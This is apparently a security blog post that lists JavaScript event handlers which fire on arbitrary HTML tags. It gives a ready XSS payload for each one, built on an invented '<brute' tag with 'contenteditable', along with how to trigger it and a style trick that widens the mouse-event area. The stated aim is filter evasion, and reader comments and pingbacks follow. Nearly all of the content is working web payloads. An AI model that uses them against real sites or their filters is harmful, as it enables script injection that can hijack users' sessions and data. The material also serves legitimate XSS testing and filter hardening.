When building XSS payloads, some javascript event handlers can be used regardless of the tag used and work on the 5 major browsers until date (Chrome, Firefox, IE/Edge, Safari and Opera) hence the term “agnostic”.
When we use the term “regardless”, we mean almost any existent HTML tag (very few exceptions) and also XML ones (arbitrary tags).
They are very useful for filter evasion because with them we have no tag name restrictions. They also allow some useful tricks for XSS payload building (to be shown in future posts).
For the following examples of simple payloads with agnostic event handlers, we will use the arbitrary tag “<brute” with the help of the “contenteditable” attribute in some of them.
onblur
<brute contenteditable onblur=alert(1)>lose focus!
Trigger: click with the mouse left button on the “lose focus!” text (or use tab key to go to it) and then click out of it (or use tab key again).
onclick
<brute onclick=alert(1)>click this!
Trigger: click with the mouse left button on the “click this!” text.
oncopy
<brute oncopy=alert(1)>copy this!
Trigger: mark the “copy this!” text clicking and holding the left button of the mouse on it, dragging the cursor. Copy the marked text with ctrl+c keys or choosing it in the mouse’s right-click menu option. The tab key may also be used instead of marking the text.
oncontextmenu
<brute oncontextmenu=alert(1)>right click this!
Trigger: click with the mouse right button on the “right click this!” text.
oncut
<brute oncut=alert(1)>copy this!
Trigger: mark the “copy this!” text clicking and holding the left button of the mouse on it, dragging the cursor. Copy the marked text with ctrl+x keys or choosing it in the mouse’s right-click menu option. The tab key may also be used instead of marking the text.
ondblclick
<brute ondblclick=alert(1)>double click this!
Trigger: click twice with the mouse left button on the “double click this!” text.
ondrag
<brute ondrag=alert(1)>drag this!
Trigger: mark all the “drag this!” text clicking and holding the left button of the mouse on it, dragging the cursor. Click and hold the mouse left button on the marked text and drag it.
onfocus
<brute contenteditable onfocus=alert(1)>focus this!
Trigger: click with a mouse button on the “focus this!” text or use tab key to go to it.
oninput
<brute contenteditable oninput=alert(1)>input here!
Trigger: click with the mouse left button on “input here!” text or use tab key to go to it and then enter a character (alphanumeric or special ones).
onkeydown
<brute contenteditable onkeydown=alert(1)>press any key!
Trigger: click with the mouse left button on “press any key!” text or use tab key to go to it and then press a key.
onkeypress
<brute contenteditable onkeypress=alert(1)>press any key!
Trigger: click with the mouse left button on “press any key!” text or use tab key to go to it and then press a key.
onkeyup
<brute contenteditable onkeyup=alert(1)>press any key!
Trigger: click on “press any key!” text or use tab key to go to it and then press a key.
onmousedown
<brute onmousedown=alert(1)>click this!
Trigger: click with a mouse button on the “click this!” text.
onmousemove
<brute onmousemove=alert(1)>hover this!
Trigger: place the mouse pointer over the “hover this!” text and then move it.
onmouseout
<brute onmouseout=alert(1)>hover this!
Trigger: place the mouse pointer over the “hover this!” text and then place out of it.
onmouseover
<brute onmouseover=alert(1)>hover this!
Trigger: place the mouse pointer over the “hover this!” text.
onmouseup
<brute onmouseup=alert(1)>click this!
Trigger: click and release a mouse button on the “click this!” text.
onpaste
<brute contenteditable onpaste=alert(1)>paste here!
Trigger: mark any text somewhere by clicking and holding the left button of the mouse on it, dragging the cursor. Copy (or cut) the marked text with ctrl+c (or ctrl+x) keys or choosing it in the mouse’s right-click menu option. The tab key may also be used instead of marking the text. Usually we already have something to paste, so we may skip this step. After it, paste it in the “paste here!” text with ctrl+v keys or choosing it in the mouse’s right-click menu option
Although they require user interaction, depending on the context it may be trivial to trigger the payload. In some cases it’s almost unavoidable like in the payloads with the style attribute enlarging the surface for “onmouse” events for example:
<brute style=font-size:500px onmouseover=alert(1)>0000
You may test them on:
#hack2learn
Keep on writing, great job!
Awesome post!!!! Helped me perform the filter evasion…
Keep up the good work.
Can you start the course for the same?
Thanks, maybe until the end of this year.
[…] So the next step is just trying all event handlers allowed based on that number of chars; after finding one that does not get blocked, change the “<x” tag to one associated with it (no need if it’s one of the agnostic event handlers). […]
[…] Agnostic Event Handlers […]
[…] to a tester/attacker by using the resulting “<InvalidTag” string with any of the agnostic event handlers to form a new attacking […]
[…] door to a tester/attacker by using the resulting “<InvalidTag” string with any of the agnostic event handlers to form a new attacking […]